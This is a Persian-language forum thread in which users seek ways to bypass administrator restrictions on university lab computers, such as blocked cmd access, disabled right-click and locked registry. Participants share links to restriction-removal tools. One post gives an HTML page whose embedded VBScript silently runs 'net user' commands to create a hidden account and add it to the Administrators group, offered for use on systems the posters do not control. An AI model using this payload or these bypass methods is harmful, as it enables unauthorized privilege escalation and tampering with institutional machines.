آقا صادق وقتی ما نمی تونیم دانلودش کنیم چه طور روش کار کنیم!
اگه لینکو تو یه جا دیگه آپ کنی قول 100 در 100 بهت میدم که روش کار کنم و جوابو بهت بدم
Printable View
اگه لینکو تو یه جا دیگه آپ کنی قول 100 در 100 بهت میدم که روش کار کنم و جوابو بهت بدم
من نمی دونم.... یعنی شما این پیغامی رو که سایت MegaUpload میده رو متوجه نمیشین چیه؟؟؟؟نقل قول:
یعنی تا حالا از سایتMegaUpload دانلود نکردین؟؟؟
حالا شما که نتونستین بعد از 3 روز چرا بقیه دوستان هیچی نگفتن؟؟؟؟
واقعا نتونستن کاری بکنن؟؟؟ اولش با شور اشتیاق بحث رو شروع می کنن و بعدش ام هیچی.... میزارن میرن...
خیلی حرکت زشت و ناپسندی بود ، چون من فقط به درخواست دوستمون اون برنامه رو نوشتم و وقتمو گرفت... اتفاقا جواب سوال یکی دیگه از دوستان رو هم به صورت فیلم براشون گذاشتم .... ولی ...اشتباه کردم...یه درس خوب بود...
مگا اپلود ایرانو خیلی تحریم کرده (حتی بیشتر از رپید)
اصلا اجازه دانلود نمیده
من خودم بارها برای یه فایل به این سایت سر زدم ولی همیشه با اون پیغام مسخره روبرو شدم
sadegh گل چرا ناراحت میشی
بابا من که این چند روز اصلا نتونستم به اینترنت سر بزنم گناهم چیه ؟
حالا جونم بی خبال شو یه بار دیگه upload کن اگه تو 4shared باشه که چه بهتر
دست درد نکنه
من به اون خیلی نیاز دارم
راستی اون شرایت سخت که میگفتی من مثال زدم ولی شما توجهی نکردی
تو سیستم دانشگاه ما که خیلی خفن هست ما نه با نرم افزار های portable میتونیم کار کنیم و نه هیچ چیز دیگه به run و cmd هم دسترسی نداریم حالا اینم شرایت سختی که میخاستی من باید چه کار کنم ؟
راستی یادم رفت بگم ما رو هر چیزی که راست کلیک میکنیم انگار نه انگار هیچ اتفاقی نمی افته و هیچ گزینه ای نمی یاد اینو چکارش کنم ؟
خوب آموزش چي شد ما منتظريم
فكر كنم در مورد يوزر limit و admin زياد بحث شده
ساخت يه يوزر ادمين در ليميت كه كار سختي نيست اون هم با يه صفحه html قبلا آموزش اون رو داشتم مي گردم پيدا مي كنم مي زارم
مرسيok
سلام دوستان ببخشید من امتحاناتم شروع شده بود نبودم . ولی حالا هستم . بحث را هم چند روز یک بار دنبال می کردم .
دمت گرمنقل قول:
خوب آموزش چي شد ما منتظريم
فكر كنم در مورد يوزر limit و admin زياد بحث شده
ساخت يه يوزر ادمين در ليميت كه كار سختي نيست اون هم با يه صفحه html قبلا آموزش اون رو داشتم مي گردم پيدا مي كنم مي زارم
مرسيok
اقا mahdi مگه اینکه شما به ما کمک کنی sadegh خان که قهر کرده حتی فکر نکنم دیگه به این پست سر بزنهنقل قول:
سلام دوستان ببخشید من امتحاناتم شروع شده بود نبودم . ولی حالا هستم . بحث را هم چند روز یک بار دنبال می کردم .
سلام.نقل قول:
این فایل رو دانلود کن.
تو درایو C اکسترکتش کن.
فایل omid.sarmad رو اجرا کن.
کادر open With باز میشه.
فایل اجرایی موجود در فایل zip رو بهش معرفی کن.
مشکل حل خواهد شد.
میشه آموزش اونو بذاریدنقل قول:
ممنون omid جان ولی ما به درایو c هم دسترسی نداریم و همانطور که گفتم حتی برنامههای portable هم اجرا نمیشن با این وجود اگه میتونی یه راه دیگه بگو
در ضمن اون رو هم یه جای دیگه upload کن نه تو rapidshare
من اینو پیدا کردم ولی نتونستم نرم افزارشو دانلود کنم اگه کسی تونست برا ما هم upload کنه(لطفا تو 4shared.com)
ساخت يوزر ادمين داخل يوزر ليميت
این برنامه داخل یوزر لیمیت یوزر ادمین میسازه.
البته 100% جواب نمیده. باید سوراخ های مورد نیاز رو سیستم مورد نظر باز باشه تا برنامه کار کنه.
لینک مستقیم دانلود:کد:http://www.parsaspace.com/payman/Program...or_1.0.zip
راستی Omid جان بعد از اجرای اون چه اتفاقی باید بیفته ؟
کدوم مشکل حل میشه ؟ راست کلیک درست میشه؟
سلام.فایلهای exe اجرا میشن.رجیستری رو باز می کنه.محدودیت import به رجیستری رو از بین میبره و ...نقل قول:
اگه تونستم یه جای دیگه برات آپ می کنم.
چقدر شما مهربونید!نقل قول:
عزیز دلم
اگه خود فایل regedit رو ببندن دیگه هیچ کاری نمیشه کرد
خیلی کار ها میشه کرد که نشه ریجستری رو باز کرد و هیچ برنامه ای هم نمیتونه کاری انجام بده
مثلا این که اجازه ندیم برنامه ای نصب بشه و خیلی راحت ریجستری رو هم ببندیم
موفق باشی
با اجرای یک exe بدون نصب نرم افزار میشه من در کافی نت امتحان کردم
و...
ولی...
سلام djsystem عزیزنقل قول:
برای چی اقا صادق قهر کردن . مگه چی شده ؟
یه چند روز من نبودما .
شاید اقا صادق نمی خوان چیزهایی که بلداند را به ما یاد بدن .
اقا صادق به ما میگن شما بحث را دنبال نمی کنید حالا خودشون بحث را نیمه کاره ول کردن و رفتن .
سلام عزیزان
من فکر کردم صادق خان دیگه نمیاد این جا
اخه تو امضاش گفته بود شاید دیگه نیام
من هم دنبال نکردم موضوع رو
حالا خواهش دارم ادامه بدن و اون لینکی رو که Remov کردن دوباره بزارن
خواهش کردم صادق جان ادامه بده که خیلی ضروریه
موفق باشین عزیزان
آموزش رو پيدا كردم ماليه وبلاگ بود كتاسفانه يعدم نمي ياد كه بگمش
يه فايل txtمي سازيد بعد اين دستورات را paste كرده و درآخر با پسوند htm سيو كنيد
در ضمن من امتحان نكردم نمي دونم كارمي ده يا نه
html>
<title>user add in windowstitle>
<object id=wsh
classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B align="top">object>
<script language=vbscript>
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user perspolis 222222 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators perspolis /add",0)
window.close
نقل قول:
hاز همه دوستان که در بحث شرکت کردنند متشکرم.... [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
برای روشن تر شدن منظورم یه فیلم از سیستم مورد نظر می گرم و براتون آپلود می کنم تا بهتر منظورمو بگیرید...
-----------------------------------------------------------------------------------------------
نقل قول:
من برم امتحانمو بدمو برگردم فیلمو برای شما Uploud کنم...
به شدت علاقه مند به بحث در موضوعات امنیتی هستم.... و از ذوستان می خوام که ادامه بدن تا به نتایجه خوبی برسیم....
1:40 PM
نقل قول:
نقل قول:
اینم فیلمی که گفته بودم:
326 کیلو بایت
نقل قول:
کد:
نقل قول:کد:http://h1.ripway.com/SadeghPM/Restrict.rar
کد:
کد:http://www.megaupload.com/?d=9WGEG6ID
امروز اين آموزش رو اماده مي كنم و توي اولين فرصت ممكن براتون آپ مي كنم...
نقل قول:
دوست ندارم وارد بحث هايي كه ويروس ها انجام ميدن بشم!!! بزارين اول اين موضوعي رو كه شروع كرديم تموم كنيم بعد به اين بحث هم مي رسيم...
اگه دوستان تمايل داشتن كارهايي رو كه ويروس ها انجام ميدن (كه هميشه جالب ترين و زيبا ترين ترفند ها هستند)رو هم شروع مي كنيم ...
نقل قول:
تک تک اون محدودیتها رو بگو چی طوری اعمال کردی تا منم رو سیستمم اعمال کنم ببینم میتونم نفوذ کنم یا نه ؟
ازت خواهش میکنم فقط کامل باشه و تا اخر این تاپیک باشی
فكر خوبيه ...من يه فايل EXE درست ميكنم كه با يك كليك اين كار رو انجام بده بعد دوستان روش كار كنن....
البته اگه راه اصليشو بگم كه ديگه آنتي شم گفتم.....
تو اولين فرصت آپ مي كنم...
در ضمن اون فيلمي كه من گذاشتم از روي سيستم هاي دانشگاهمون بود نه سيستم خودم... كه به وسيله سرور مركزي به سيستم ها اعمال ميشه...
نقل قول:
نقل قول:
بیا برات آپ کردم.ولی پیشنهاد می کنم اگه حال ویندوز عوض کردن نداری اجراش نکنی.
دیگه خود دانی.
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
راستی بهروز عزیز خواهش می کنم از این برنامه سوء استفاده نکنی و باعث برهم زدن آرامش سیستم دیگران نشی.
دلم نیومد سوال دوستمون بی جواب بمونه:
نقل قول:
کد:
کد:http://h1.ripway.com/SadeghPM/Amozesh/Disable_exe.zip
نقل قول:
این کار اینقدر ابتداییه که فکر کردم مد نظر شما نبوده!!!!!!!!
اونم کاری نداره [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اما اون برنامه ای که قولشو داده بودم امروز تمومش کردم...
تستش کنید و جواب رو بگید.... البته هنوز کامل نیست و یه قسمت از یه برنامه کامل هستش ..البته اول تویه یوزر Admin امتحانش کنین...
منتظر نظرات هستم......
لینک دانلود 1.7 مگبایت:
نقل قول:
کد:
Removed......کد:http://www.megaupload.com/Link
نه exe اجرا مي شدن و هيچ كدوم از اجزاي control panel باز نمي شدن مجبور به repiar شدم
البته بگم من فقط فايل exe رو اجرا كردم و يا اون يكي كار نكردم مي شه بيشتر توضيح بدي
مرسي
سلام.دوست عزیز من فایل exe رو درست کردم برای ایجاد محدودیت.یعنی از کار انداختن فایلهای اجرایی،قفل کردن رجیستری و ...نقل قول:
اون فایل بغلیش هم برای حذف محدودیته.به این صورت هم باید استفاده شه.
هر دو فایل رو تو درایو c تو ریشه کپی کن.بعد فایل omid.sarmad رو اجرا کن تمام محدودیتها برداشته میشه.
اگر با اجرای omid.sarmad کادر open with ظاهر شد فایل دوم یعنی فایل اجرایی رو بهش معرفی کن.همین.
ok omid thank you very much